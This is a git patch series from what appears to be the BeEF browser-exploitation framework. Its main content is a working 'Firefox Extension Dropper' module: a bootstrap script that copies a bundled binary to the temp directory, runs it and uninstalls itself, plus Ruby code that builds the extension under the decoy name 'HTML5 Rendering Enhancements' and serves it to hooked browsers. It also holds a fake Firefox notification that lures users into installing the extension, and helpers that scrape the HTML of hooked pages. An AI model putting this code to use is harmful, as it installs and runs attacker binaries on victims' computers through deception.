vCz80WZux07O2dEeXgRI8nE8lF0IoEKgu6y4/yRtq6XXixZhr+MsMLYcJ7aWh7J84NHxtbawQEcxxPdRwZ3KwjT4FO+3hMCsrBsn/vwkx6KVw+U4ydjHl4Qo+4xvoO7Nz0PZIbWYzOdqh8nCF2hEjJOB4TX4z5Bs5Ffu6t5pjeQfTvDAKo6apHYym3fDRa4xou1ks2BVsHjOLe6xJDvj6Oi0q4bebqP4SCO1r0fMW9IYk9t+jcfjoJvVZvyJJ84IO4+bmuSc3BgisjKLmwM+TMsZ1bwkkk9m7Z2lggJtQE40dNozA1bMw5AmHBz5a0mi4cSa2Dq6cX9+pUcKMZxy/e1jiaXIr22/0NWamEpKc4Gs8Nt+gvv2XFDiQ5x2PzunEwTTuIK9+kXE4K1eoetEgb/PRlbO/o1ufn3ialtgvtCl7naEro3qHoGXAH0nM2yhLfjDLFkYmVxooO+ZouJWWQhxjUdfWiQ2sFZ0cDzWl5eE3Vho3LtuN4YCI2rUuEydG9uPJ92kMHyiUY//BZtEk666+rK5vQQF9WG2vxXcgZ+tHTaNu7OdikeZOTwl6u2isMZdSyE1ewjMLyYecciTfXcWV+IGlxYuD8J/T/gW5G2RYYd9PV+ITBRF59eS9eao7DWw9NgsfAXhgjHfXjyNzawRWX/3kcltwVrx+sCrnKHqxP70Vbp1KqU2Impujs4d4gYzkFkeDD77zexmc7iJuR/xAabqQL8AzDP1fciRlDV+tLjhCTLvImH14XCweKTjHNNvAWLKRk5MkjGwobezNuHVPp9RGzC+rQaWINB3uhnyGRl4p1uY1ugfDUX2/js6BpgwRGOnFuhzv+dTcmpKZjycvr0ej+V9xG+aL+iXooVsxR04JKOs2exr+3Aate2YLOa2bju9ciod63CVd+RVryHjYzDqYL07COe1QiYuJhJUVdM8o0RdSUSfgoIRTvvbMHr7xbhidvcYSDRpj5SSMGk/w99HTTkhBgxj1YQkeRRH5xbvwM+c4JkS33BF5z72V47YYwaf+dyKFPBrncfyZorr7vcrw2L/Q0mqIdBp4SjRuuuZ8014VCzLOMqajOKHfoUfA26sFTW0s4W3rir0sfwE2eomU0pi6slk5FXiO98VzcMJ47YNHbCzEtJRVv0NLaHvR/WDxSGl2z1zGjexxQN6T9AH+L3Ra23Lcq8oskjkM/hrJL94x/jLKMeYw0Q/MJWtppTB2x+N0HMf1QKt58ZQ3agx/EonjhomdM7OiGtAc6tge11MdWR3fcZ7bCc/Et2DLLD4rNa3BjEvPQCiO1c9wLR38QqX4Z20ATupXExYzEW6tuxKihIiS8jPLO58jyiPorTVgM+aT6LM5FmcVH0IgJiaDTf/WPm4Q3V4Vg/Rff4dXns/B/7yzGaOmmnldv9WH8e2k27lr+DOaGC/fiF1AkOiUjP3E0TpKlc9E2GJMWSqUSvfS4gI7PtVOB2tZ+utSwokm6CT5CH6GX4VzZh066zHtQTw2tjO1sHzTEUbRJnYzSpVaLRStHzL7nXn6McmgP6xDTWJGEPvxISegivosvQoaQJd34mT8ivyA08vkZcvm2jICMgIyAhIAOLsOH4+k7R3Px2tihinZItCeGNsWK79K1VKNLjIOc9W2Mpotu11aWDIZHTwSO67vFhnzuWwUXNtu5vxYMwGEyMDbQwdzBDsMZofqJh0eBu3AGUmd9k0GOUZ64ZWzLxFEkU4SOjsMLMT744vPj+PjLWtx733hEOQ/twwWdsR005hfXjDys8afF1yIxqxCrPt6Hds9rcLewdBjL2deC9fRqwtWT8MFMH6gPJ+HuvSK/sU0dylNcGyprCJ+B6yThGK9f16sfPwrHFCZFJ7ExlM/c3g5jE4Pg4ygGiUY5gmowca317P8EM18/7tnQWKKkQkH3MyuMThyOe+6Yi9vnz+FG40BaMMUDBTo6FFD2tcLatBrWZvXsw0Rsv7P/66/JR1p7AO595Bo8tuhK6fP0I9MRUccBZM4gCEYuetWN33gUEwsGJwiM9YZlRxM2bs/GKb4XTMfABtMnuiCJIe0rWWn6SrLx7q46KbvONwo3jO7B6uXZaOQ9RXoSPk7TA6df7Rzkjz4VWjhz7RSdLssifehCEj52GHoOpGBbCVcu2TEnbz6B+vgYTOA+KiOdkYsklHJ6+7UIkvRswNfb6DbZQhOGhI/+r5F+6LE+aTfW5FB/VTWWv5MBv8sTEEbzq16KONrB1a0T+w6cIk0NVi7PkfZrICAIE7xasPbzXDRRdvOxJHx6wljGoRJ+/HyoRpL+kp5DacVVfm+qwqaDZVDYBeDaOYGwoXlYRJ8b+m8gP+tO7Lgw1H93ELur26lvF/ZvyUYJV/njeL026ThyGjrRV1OOL3YVo6VHuAhZ8eXaauzeV0r6FmxYl4lKmn70/A06sHKL7wM6B8ZjTnA9Vi2jS5goe2MNvv++BF1B8bgqrAHr1xWghddrUg7iq2wRLuWH/0y4Cl5P/+IeBuIYwT1mlesPcB8adWPgkz2rU9E3OQGjOPAe+Ofmj7mTLPEt/aJrybsvLxXvJbUP6DSAQVEqVqSrEJIYywAMFuhqF+5IdBU7cQgruJmoT9WEL5cegdmUUUgw8Bc/Xp1SBS4yIXSYN8xaq7Cc+9C6uTFVku8TiymOhYyqyPDbDChgRfPdwL/uDhxJykRWlzuuvT4GniY96PNNxGUe5fj80wzUUNe6UxVc8VIyiqInJz0CR5H0HMTReC6uSOe2jNY53g+5n+zFoY5e6qzA9q8ZlYfPfkAuacbSFTlX7NdjoyTRrDuBKrqyDvCzo9vVeB9kL9/L/Yx6mu+/OoFq/tYGZA08W2Yb5K4/9wrBTZN1WPUi93QJzEX9WJN9WgRCoz4DudkHqRpa0cB2Q5OTjOVZpojmHr5ZMTq0t4ndS4Z/XJmbOMEL6Ut34yjbgD5VB7Z+eBg2V41FrI2+XRqgZZ6huhmviwUGpUGWVhrQD2gh5TDmEVfFM9bmHKKV3hyxk+MxI5qLWUP1kfQCXZF3Y1WmKGsdPn79KDyvGoNohhHpprCwKE+YNJXhna+L9aXgy+mnhXbhi4+y0EB8uo8n4cNUfRtgFjkGY3W5WLMxn+2DCieLynDgaDU6q05g0d+3I1thLMW5H4V7nzSBEZMYnmu5gVqjZXvQz9+rNAkRuIl7hrZU3YvCA9twkN4Nf7hxMvc+tXHiz9vEqre+AU39tGR1dMHcna/r8LRDV+kBrNhWpc8vTewE7kKm+AjeQ+VTBhf9VHWMiLnjKKq4dJtJN+4jXa6Yzg3jenrmoSx7e2sUFOaisaEJWceTGTCnGhpzMwQyYEflrgMMusQAP7UF+Or7dNSLwEsDZTCWRRzP1EHw1uugl6VBe952LP7n1/S8yMCT97+LAxWVWPnCu/gkvfE0nnrXSH2bdu7oy5QyAjIC/+sIsCGRkhjHDsVCXBz47uKJWSPNsWNFBkrYDyr7OX7cXgGv0UHwYhAnLaMRHkspQCGNK3U1J7G/QI0RYXTZl8YGei4uDD7kUsU9WRmN6GE7XZhdiRxGoBNST5MlfR/sHyUtGMQrI70MRT1OmHV5EFyhhIpB1Qb0G8hj1Nl41FOIb3SHw/oCjqcZkG5CJPfKKjiOYt9u2taNOvZ1asY96OE4NIB6m3Jf89pdlZzD6DGR8huk6c/1/CXFB67rrxl1kujcXDE2uJ/bUkqkve/KolyszhSLeXoqDRfrclNPIr+x28DFmHvw+PNRCqlFUIA7Shg0QkQnFJEJvd1UfN9JBTrAqB4mvZSnB7mT7lcqFva0VU59KX7yb+6RckTOmYAxPhydGPhY+IdhwZUhOFxSS9dBBi2gNUG6x9XceM4gvYWPoF4kJ+HcI7UgEU8u24x56+1x3YxhdA+y5qTPHJNuuxqPtG7AvfPfAwKj6cc/FsnsXOkwilueX4C6R1bjr/P3wGr4eLx7z3Ao6YolXCRDooPh7sCnx/ImzB2DfW/uw30KNT683hkxEV50CzHhnpjx+OhFc/zj7S+xjlYNlxGj8dZjo+HAgYVboB+GSW51VNKCKwHU2cvNC5fdMRKPL/sG8750wk2zYjHXyZ7ujtzzxA1/CRZcgTWUfyhYoTPH4dSy9zCvhca4cZdh7Xx/ic4zlFHbPLgioHPAA+/8EU/fvQHzNnti/n2TcWUGw/Wbu+PRZX+lTl9hwfxdsBs+BvdPZqh7yV3LCN6gJEcfHyTYc0WDtdYj2B/RfEeBHnN7jEgMhKfwPRuSTdCPoLsk6Draefwg7vmApuXAECy6bzq8xUYFQ1nM6VsbFeMLF8mvkyH3Z07DEr6j57mnP8FKLqK4jp6At2ZYwn3WBPyzuRNvPbocXa5+uGkY3cnaRPlsMe/Ja3FqIZ/v/EzMuXkYbmI+R8GfAS1GqGjNoxueZ2gAooSVQ1xnPbnn1fux8tVVuG/+IUZotMcN998CO16/84Vb8dZTGzF/NyMqjp2Ify+wgbd438RQ7G3tMPXaOBz/aBseaZmN5X+bhVWM0vjgEyvxQR+f77jJ+GBRDOyG5jGzxOyHb0H902tw1/x02qNH4rk7ElHEd3AJ3r6RIbByoxw3J+S+tgrzOHBzHz8V7892ROMRuuMysIDZli8w72P+fph3zaIoib8Ivx/PSR+cvPD3RXG4//WV2Gbphbtnj8KMOuEuKx6KFa74YwIOJdFljGFNTYbqRUtNb/VJLFm6D2onF/z5/hvYaNgh4Z0HsIZ18W/z98OCEer+fN8NuJr7w7qaehAZ6QtXsTrGuuDu74VIc272Fzxt7DEyjq4GHIwG//EqvG26mQPHZXyexHLSDHzE384AjvQDH3XdHLwlaO75gAFkSDN5Jj4mSaO7GxLCLOmKbIZR864mn034590fcE+MnuYyUX3c3UljxWkE5eoYKZNRgpz5qCX+XEwZG21Ldy0rXPvUQihffg+L52fxJjDtbwswj/XBJyqEez9FXn4snZCY6AdX4QfAZ3eb7yru9fseL/3ZB0eXLMW3jGLkOXUOVk6nqdqInYkZxt50LdZ676ab9PtS1fecejk+uTeY+PbANzoUpk5iUM0CMSLlaMGfndXQ3wjGT8FfPFbhsSd0+PdDiYiMZ5221evkxN/88F6+74NLXsHRIbBlHdS5OuPQovewgeXwmXEtVkw5o16SedAVU9CynO1BM5un+Kn47m+BUrmfX1yGuxe/hy8cA/DwzeOhrHOk6x599j+4G+qHPuPi2F6YxY7D4umO6KNl0Ywur0++tQDvv7MJC7bQ8uzti3vuu4ZuGy183Yc5DTpnlEWScpY/xE3HhTcdJ1gi6TjZStq2DY0MWrKWewDC7/LCsHA1F+I4KTcxR3BMGFwZVlXZXo+ljzxGy6El5ix8DFdH0DjvfxWu2fAmHvq7Bu8uno27pryH5+96DLYB4/DoP/6AVkapFZbY0GgGnLEXgZvANjsKPmyzjfIlHaiPfVAoojQn8djdu9DuGIj7Hud+MC9LNHc4ITbCl+2kCcJmXo5HytbjmYUvITAhETctmo4QWk+HXzkPL3d9gzcfewGvOwZhDtu30D6+TcxQRqmghj8mdKsPi46kPuz0zdjmxYbC1Vq44ejYHwQhro8RvMzb6AUirMj8KTGYlDmjGlpZs86ZDeImsROTU1EPjXVxqCD5XEZARkBG4CcQsHKk23qgmlGih7YfXFRydUK4mm5+YtLEsfGUBXPgsm0flvzjW4lT3NUz8X/T9FtO/OPCMJXRqb96+1vUMWL09Fsm4vIIGwZkUiE4yB3OHI44e/pz/3IiPll/EA9/zWEgX9Hzt5tFJHPtAI3oG10YvCLYhFEJRX9iZY1obmuxszRDGyMTr+LiqobbGa65eSriPKjGkPbOO9gHSic2lOzLAyO86TElykM5Li6I5p5ja0ZKzn9nK/ZwYOEychSeH08fPjNfzJ9Vic9e34uGuRNw74JgPPvBFuy2csOtUyO58C62JOjg6OOFCDt9X+/o7YkI+zPPOe4J8uZ4Scjkh2P42Bh3ODHS4Y1PzIHqtR148h/ZotPBX8cykAb7U6Pullbm0H/V7yw+8zGZ9Dd8TI5nT4czerBtdzH95rklme+sCgu0wy3XhqOsnBvhP8uEi6sbnBgi3NraArfO9YOviE8up4tGIHPtWrxUF4v1jwy/aF7tGel4cGUp7n3mekz0HGIDvmjOvw6D2h2b8KcUBhd4cdyvI+B3xLXswAE8tb8fHzw+Cy62whx9vqkXa576BBnxc/HSzQH6fTjny0Km/90jkLdpE57M88GmJy/sN9FfmovbXzmO21/8E/362UH9gunY8ZMIi0zkvt2hm9h+QQEXwErV1YlXn3gBYbc/g1u5yfmikqIRy1/6BGVTrse/xazwV0ylpWXo763l4MT7V5Qis5YRkBG4lBBobe/BF18Pbg65lMr2ey1L7tE8IDgScd4/HFOPGRmAiYy2PjSdk4VLrGqHMkKa8L2UJnymnbC3aeRKeDhnetOkPSOWZrR2mfbD0aqesz3hKieni0VArJrSQDEwez5ffgc+/hT/2kHTGJOl1h23v/lHjPIYsop/vgx/Q3oTWkjEe6WMKwe/oejfXJSwqlowKAULe97lrcnIwCsf7Eap21h8wuh34j1fcro0EbiQ30T6l2vxxIZaCRDTXicsePcGTPRh5/Cr1BPhQifc634vidGvhDWPESYvRK+mwiwseeNzRktleVRWGHblLCyeFXBBvM4LEcn98vzbgvOSIRPLCMgIXFII2NHgMX1i6CVVpt9bYYp3H8Lr2+v57kyhmQcWL7kasWKc+iPJy+OHXmsm/fUfyiO0HwFLviQjICMgIyAjcG4I6C1cCfrItOeWRab6CQRKS8tp4aqXLVw/gY98WUZARkBG4L8RAZo76C8uJxkBGQEZARkBGYELRUAs8klBIn5PFq4LLcx/OJ/RwiX3zf/hByGLlxGQEZAR+OUQOCeXwl9OnMxJRkBGQEZARuBSQ8CGm4V7evgSFy3jzxveqHaplfG3KI9WvLRU1Us3/cGN2L+FXFmGjICMgIyAjMCvi4CI2yUnGQEZARkBGQEZgQtGIMDPBbmFZXxPVT8sGXFQTheGQDfj4re1NSCOr3+Q++YLw1DOJSMgIyAj8HtEwERV957crv8en4ysk4yAjICMwH8RAu18J1tdQwdfDSK7FV7oY7OxsYCvtxPsxWtF5CQjICMgIyAjcMkgYK7V/niEjUumhHJBZARkBGQEZAR+dQQcHWwhPnK6eAToWSgnGQEZARkBGYFLCIH/B4ND0vu5e4eCAAAAAElFTkSuQmCC'>");
+        $j(hid).append(elr);
+        $j(hid).click(function() {
+            $j(this).slideUp(300,function() {
+                $j(this).remove();
+            });
+            //window.location.href = ff_extension;
+            window.open(ff_extension);
+            beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=User has clicked the notification');
+        });
+        $j(hid).css('cursor','pointer');
+        $j(hid).slideDown(300,function() {
+            beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Notification has been displayed');
+        });
+    }
+});
diff --git a/modules/exploits/local_host/firefox_extension_dropper/config.yaml b/modules/exploits/local_host/firefox_extension_dropper/config.yaml
new file mode 100644
index 000000000..ea46d4cf2
--- /dev/null
+++ b/modules/exploits/local_host/firefox_extension_dropper/config.yaml
@@ -0,0 +1,16 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        firefox_extension_dropper:
+            enable: true
+            category: ["Exploits", "Local Host"]
+            name: "Firefox Extension Dropper"
+            description: "Create on the fly a malicious Firefox extension that embeds a dropper you can specify (add it to the 'dropper' directory). <br/><br/> The extension is based on the original work from Michael Schierl and his Metasploit module."
+            authors: ["antisnatchor"]
+            target:
+                user_notify: ["FF"]
+                not_working: ["All"]
\ No newline at end of file
diff --git a/modules/exploits/local_host/firefox_extension_dropper/dropper/readme.txt b/modules/exploits/local_host/firefox_extension_dropper/dropper/readme.txt
new file mode 100644
index 000000000..89e9322f9
--- /dev/null
+++ b/modules/exploits/local_host/firefox_extension_dropper/dropper/readme.txt
@@ -0,0 +1,2 @@
+Place in this directory the binary you want to drop and execute through the Firefox extension.
+Make sure to have just ONE file in this directory (other than this readme.txt).
\ No newline at end of file
diff --git a/modules/exploits/local_host/firefox_extension_dropper/extension/bootstrap.js b/modules/exploits/local_host/firefox_extension_dropper/extension/bootstrap.js
new file mode 100644
index 000000000..dcaf24fa6
--- /dev/null
+++ b/modules/exploits/local_host/firefox_extension_dropper/extension/bootstrap.js
@@ -0,0 +1,30 @@
+
+function startup(data, reason) {
+  var file = Components.classes["@mozilla.org/file/directory_service;1"].
+          getService(Components.interfaces.nsIProperties).
+          get("ProfD", Components.interfaces.nsIFile);
+  file.append("extensions");
+    xpi_guid="{861fb387-92ce-bb0a-cb48-4b923dbc292b}";payload_name="__payload_placeholder__";
+  file.append(xpi_guid);
+  file.append(payload_name);
+  var tmp = Components.classes["@mozilla.org/file/directory_service;1"].
+          getService(Components.interfaces.nsIProperties).
+          get("TmpD", Components.interfaces.nsIFile);
+  tmp.append(payload_name);
+  tmp.createUnique(Components.interfaces.nsIFile.NORMAL_FILE_TYPE, 0666);
+  file.copyTo(tmp.parent, tmp.leafName);
+    
+  var process=Components.classes["@mozilla.org/process/util;1"].createInstance(Components.interfaces.nsIProcess);
+  process.init(tmp);
+  process.run(false,[],0);
+      
+  try { // Fx < 4.0
+    Components.classes["@mozilla.org/extensions/manager;1"].getService(Components.interfaces.nsIExtensionManager).uninstallItem(xpi_guid);
+  } catch (e) {}
+  try { // Fx 4.0 and later
+    Components.utils.import("resource://gre/modules/AddonManager.jsm");
+    AddonManager.getAddonByID(xpi_guid, function(addon) {
+      addon.uninstall();
+    });
+  } catch (e) {}
+      }
\ No newline at end of file
diff --git a/modules/exploits/local_host/firefox_extension_dropper/extension/chrome.manifest b/modules/exploits/local_host/firefox_extension_dropper/extension/chrome.manifest
new file mode 100644
index 000000000..2864216f5
--- /dev/null
+++ b/modules/exploits/local_host/firefox_extension_dropper/extension/chrome.manifest
@@ -0,0 +1,2 @@
+content	{861fb387-92ce-bb0a-cb48-4b923dbc292b}	./
+overlay	chrome://browser/content/browser.xul	chrome://{861fb387-92ce-bb0a-cb48-4b923dbc292b}/content/overlay.xul
diff --git a/modules/exploits/local_host/firefox_extension_dropper/extension/install.rdf b/modules/exploits/local_host/firefox_extension_dropper/extension/install.rdf
new file mode 100644
index 000000000..0813095d0
--- /dev/null
+++ b/modules/exploits/local_host/firefox_extension_dropper/extension/install.rdf
@@ -0,0 +1,24 @@
+<?xml version="1.0"?>
+<RDF xmlns="http://www.w3.org/1999/02/22-rdf-syntax-ns#" xmlns:em="http://www.mozilla.org/2004/em-rdf#">
+  <Description about="urn:mozilla:install-manifest">
+    <em:id>{861fb387-92ce-bb0a-cb48-4b923dbc292b}</em:id>
+    <em:name>__extension_name_placeholder__</em:name>
+    <em:version>1.0</em:version>
+    <em:bootstrap>true</em:bootstrap>
+    <em:unpack>true</em:unpack>
+    <em:targetApplication>
+      <Description>
+        <em:id>toolkit@mozilla.org</em:id>
+        <em:minVersion>1.0</em:minVersion>
+        <em:maxVersion>*</em:maxVersion>
+      </Description>
+    </em:targetApplication>
+    <em:targetApplication>
+      <Description>
+        <em:id>{ec8030f7-c20a-464f-9b0e-13a3a9e97384}</em:id>
+        <em:minVersion>1.0</em:minVersion>
+        <em:maxVersion>*</em:maxVersion>
+      </Description>
+    </em:targetApplication>
+    </Description>
+</RDF>
\ No newline at end of file
diff --git a/modules/exploits/local_host/firefox_extension_dropper/extension/overlay.xul b/modules/exploits/local_host/firefox_extension_dropper/extension/overlay.xul
new file mode 100644
index 000000000..91ca363e4
--- /dev/null
+++ b/modules/exploits/local_host/firefox_extension_dropper/extension/overlay.xul
@@ -0,0 +1,5 @@
+<?xml version="1.0"?>
+<overlay xmlns="http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul">
+  <script src="bootstrap.js"/>
+  <script><![CDATA[window.addEventListener("load", function(e) { startup(); }, false);]]></script>
+</overlay>
\ No newline at end of file
diff --git a/modules/exploits/local_host/firefox_extension_dropper/module.rb b/modules/exploits/local_host/firefox_extension_dropper/module.rb
new file mode 100644
index 000000000..2408f061f
--- /dev/null
+++ b/modules/exploits/local_host/firefox_extension_dropper/module.rb
@@ -0,0 +1,92 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Firefox_extension_dropper < BeEF::Core::Command
+
+  class Bind_extension < BeEF::Core::Router::Router
+    before do
+      headers 'Content-Type' => 'application/x-xpinstall',
+              'Pragma' => 'no-cache',
+              'Cache-Control' => 'no-cache',
+              'Expires' => '0'
+    end
+
+    get '/' do
+      response['Content-Type'] = "application/x-xpinstall"
+      extension_path = settings.extension_path
+      print_info "Serving malicious Firefox Extension Dropper: #{extension_path}"
+      send_file "#{extension_path}",
+                :type => 'application/x-xpinstall',
+                :disposition => 'inline'
+    end
+  end
+
+  def pre_send
+
+    # gets the value configured in the module configuration by the user
+    @datastore.each do |input|
+       if input['name'] == "extension_name"
+          @extension_name = input['value']
+       end
+       if input['name'] == "xpi_name"
+          @xpi_name = input['value']
+       end
+    end
+
+    mod_path = "#{$root_dir}/modules/exploits/local_host/firefox_extension_dropper"
+    extension_path = mod_path + "/extension"
+
+    # retrieve the name of the dropper binary
+    Dir.foreach("#{mod_path}/dropper") do |item|
+       if item != "readme.txt" && item != "." && item != ".."
+         @dropper = item
+         puts "dropper:       " + @dropper
+       end
+    end
+
+    # clean the build directory
+    FileUtils.rm_rf("#{extension_path}/build/.", secure: true)
+
+    # copy in the build directory necessary file, substituting placeholders
+    File.open(extension_path + "/build/install.rdf", "w") {|file| file.puts File.read(extension_path + "/install.rdf").gsub!("__extension_name_placeholder__", @extension_name)}
+    File.open(extension_path + "/build/bootstrap.js", "w") {|file| file.puts File.read(extension_path + "/bootstrap.js").gsub!("__payload_placeholder__", @dropper)}
+    File.open(extension_path + "/build/overlay.xul", "w") {|file| file.puts File.read(extension_path + "/overlay.xul")}
+    File.open(extension_path + "/build/chrome.manifest", "w") {|file| file.puts File.read(extension_path + "/chrome.manifest")}
+    FileUtils.cp "#{mod_path}/dropper/#{@dropper}", "#{extension_path}/build/#{@dropper}"
+
+    extension_content = ["install.rdf", "bootstrap.js", "overlay.xul", "chrome.manifest", @dropper]
+
+    # create the XPI extension container
+    xpi = "#{extension_path}/#{@xpi_name}.xpi"
+    if File.exist?(xpi)
+       File.delete(xpi)
+    end
+    Zip::File.open(xpi, Zip::File::CREATE) do |xpi|
+      extension_content.each do |filename|
+        xpi.add(filename, "#{extension_path}/build/#{filename}")
+      end
+    end
+
+    # mount the extension in the BeEF web server, calling a specific nested class (needed because we need a specifi content-type/disposition)
+    bind_extension = Firefox_extension_dropper::Bind_extension
+    bind_extension.set :extension_path, "#{$root_dir}/modules/exploits/local_host/firefox_extension_dropper/extension/#{@xpi_name}.xpi"
+    BeEF::Core::Server.instance.mount("/#{@xpi_name}.xpi", bind_extension.new)
+    BeEF::Core::Server.instance.remap
+  end
+
+  def self.options
+    @configuration = BeEF::Core::Configuration.instance
+    beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
+    return [
+        {'name' => 'extension_name', 'ui_label' => 'Extension name', 'value' => 'HTML5 Rendering Enhancements'},
+        {'name' => 'xpi_name', 'ui_label' => 'Extension file (XPI) name', 'value' => 'HTML5_Enhancements'},
+        {'name' => 'domain', 'ui_label' => 'Serving Domain', 'value' => 'http://beefdomain'}
+    ]
+  end
+
+  def post_execute
+    save({'result' => @datastore['result']})
+  end
+end

From 050da281ac3132755076cb5108f033670a1abea3 Mon Sep 17 00:00:00 2001
From: antisnatchor <antisnatchor@gmail.com>
Date: Thu, 10 Oct 2013 20:47:14 +0100
Subject: [PATCH 385/397] Modified Gemfile. Added missing directory for Firefox
 Extension dropper module.

---
 Gemfile                                                          | 1 +
 .../firefox_extension_dropper/extension/build/readme.txt         | 1 +
 2 files changed, 2 insertions(+)
 create mode 100644 modules/exploits/local_host/firefox_extension_dropper/extension/build/readme.txt

diff --git a/Gemfile b/Gemfile
index 1a748023a..f3dcf01d0 100644
--- a/Gemfile
+++ b/Gemfile
@@ -31,6 +31,7 @@ gem "parseconfig"
 gem "erubis"
 gem "dm-migrations"
 gem "msfrpc-client"
+gem "rubyzip", "~> 1.0.0"
 
 # notifications
 gem "twitter"
diff --git a/modules/exploits/local_host/firefox_extension_dropper/extension/build/readme.txt b/modules/exploits/local_host/firefox_extension_dropper/extension/build/readme.txt
new file mode 100644
index 000000000..9aa47d25d
--- /dev/null
+++ b/modules/exploits/local_host/firefox_extension_dropper/extension/build/readme.txt
@@ -0,0 +1 @@
+This is a temp directory where the Firefox extension will be built.
\ No newline at end of file

From 69ff8c00130baba0216d3fb122c4e55e6c4b54b3 Mon Sep 17 00:00:00 2001
From: antisnatchor <antisnatchor@gmail.com>
Date: Thu, 10 Oct 2013 20:54:29 +0100
Subject: [PATCH 386/397] Added rubyzip dependency to core.rb. Fixed a bug in
 dom.js when attaching applets for IE.

---
 core/core.rb            | 3 +++
 core/main/client/dom.js | 3 ++-
 2 files changed, 5 insertions(+), 1 deletion(-)

diff --git a/core/core.rb b/core/core.rb
index d150c4787..c16318217 100644
--- a/core/core.rb
+++ b/core/core.rb
@@ -37,4 +37,7 @@ require 'core/main/migration'
 require 'core/main/console/commandline'
 require 'core/main/console/banners'
 
+# @note Include rubyzip lib
+require 'zip'
+
 
diff --git a/core/main/client/dom.js b/core/main/client/dom.js
index 5a515967e..c184fae17 100644
--- a/core/main/client/dom.js
+++ b/core/main/client/dom.js
@@ -384,7 +384,8 @@ beef.dom = {
 
             if (codebase != null) {
                 content += "<param name='codebase' value='" + codebase + "' />"
-            }else{
+            }
+            if (archive != null){
                 content += "<param name='archive' value='" + archive + "' />";
             }
             if (params != null) {

From 70cac51a5d29efc2af139865a4ecc5890297c4fb Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Fri, 11 Oct 2013 23:14:56 +1030
Subject: [PATCH 387/397] Add error check for missing dropper

---
 .../firefox_extension_dropper/module.rb       | 20 +++++++++++--------
 1 file changed, 12 insertions(+), 8 deletions(-)

diff --git a/modules/exploits/local_host/firefox_extension_dropper/module.rb b/modules/exploits/local_host/firefox_extension_dropper/module.rb
index 2408f061f..83a92af27 100644
--- a/modules/exploits/local_host/firefox_extension_dropper/module.rb
+++ b/modules/exploits/local_host/firefox_extension_dropper/module.rb
@@ -38,17 +38,21 @@ class Firefox_extension_dropper < BeEF::Core::Command
     mod_path = "#{$root_dir}/modules/exploits/local_host/firefox_extension_dropper"
     extension_path = mod_path + "/extension"
 
-    # retrieve the name of the dropper binary
-    Dir.foreach("#{mod_path}/dropper") do |item|
-       if item != "readme.txt" && item != "." && item != ".."
-         @dropper = item
-         puts "dropper:       " + @dropper
-       end
-    end
-
     # clean the build directory
     FileUtils.rm_rf("#{extension_path}/build/.", secure: true)
 
+    # retrieve the name of the dropper binary
+    Dir.foreach("#{mod_path}/dropper") do |item|
+      if item != "readme.txt" && item != "." && item != ".."
+        @dropper = item
+        print_info "Using dropper: '#{mod_path}/dropper/#{@dropper}'"
+      end
+    end
+    if @dropper.nil?
+      print_error "No dropper found in '#{mod_path}/dropper'"
+      return
+    end
+
     # copy in the build directory necessary file, substituting placeholders
     File.open(extension_path + "/build/install.rdf", "w") {|file| file.puts File.read(extension_path + "/install.rdf").gsub!("__extension_name_placeholder__", @extension_name)}
     File.open(extension_path + "/build/bootstrap.js", "w") {|file| file.puts File.read(extension_path + "/bootstrap.js").gsub!("__payload_placeholder__", @dropper)}

From 09443675cc4799dfc6553246ef321c36d64902d4 Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Sat, 12 Oct 2013 00:43:54 +1030
Subject: [PATCH 388/397] Fix bug in fake_notification_ff module

---
 modules/social_engineering/fake_notification_ff/module.rb | 7 ++++---
 1 file changed, 4 insertions(+), 3 deletions(-)

diff --git a/modules/social_engineering/fake_notification_ff/module.rb b/modules/social_engineering/fake_notification_ff/module.rb
index b7e5a2055..b2a65d202 100644
--- a/modules/social_engineering/fake_notification_ff/module.rb
+++ b/modules/social_engineering/fake_notification_ff/module.rb
@@ -7,9 +7,10 @@ class Fake_notification_ff < BeEF::Core::Command
 
   def self.options
     @configuration = BeEF::Core::Configuration.instance
-    proto = configuration.get("beef.http.https.enable") == true ? "https" : "http"
-    beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
-    url = proto + '://' + beef_host + ':' + @configuration.get("beef.http.port") +'/api/ipec/ff_extension'
+    proto = @configuration.get("beef.http.https.enable") == true ? "https" : "http"
+    beef_host = @configuration.get("beef.http.public")      || @configuration.get("beef.http.host")
+    beef_port = @configuration.get("beef.http.public_port") || @configuration.get("beef.http.port")
+    url = "#{proto}://#{beef_host}:#{beef_port}/api/ipec/ff_extension"
     return [
       {'name' => 'url', 'ui_label' => 'Plugin URL', 'value' => url, 'width'=>'150px'},
       { 'name' => 'notification_text',

From 8e6751611d9578163dd34050232de9b184102711 Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Sun, 13 Oct 2013 03:37:15 +1030
Subject: [PATCH 389/397] Add `beef.browser.getPageHead()` and
 `beef.browser.getPageBody()`

Update 'Get Page HTML' module to use these functions

Tested on IE6, FF22, C28

Fix issue #518
---
 core/main/client/browser.js                   | 24 +++++++++++++++++++
 .../hooked_domain/get_page_html/command.js    | 13 +---------
 2 files changed, 25 insertions(+), 12 deletions(-)

diff --git a/core/main/client/browser.js b/core/main/client/browser.js
index 10c5c7f51..360b2e0eb 100644
--- a/core/main/client/browser.js
+++ b/core/main/client/browser.js
@@ -1935,6 +1935,30 @@ beef.browser = {
         return foxitplugin;
     },
 
+    /**
+     * Returns the page head HTML
+     **/ 
+    getPageHead:function () {
+      var html_head;
+      try {
+        html_head = document.head.innerHTML.toString();
+      } catch (e) {
+      }
+      return html_head;
+    },
+
+    /**
+     * Returns the page body HTML
+     **/
+    getPageBody:function() {
+      var html_body;
+      try {
+        html_body = document.body.innerHTML.toString();
+      } catch (e) {
+      }
+      return html_body;
+    },
+
     /**
      * Dynamically changes the favicon: works in Firefox, Chrome and Opera
      **/
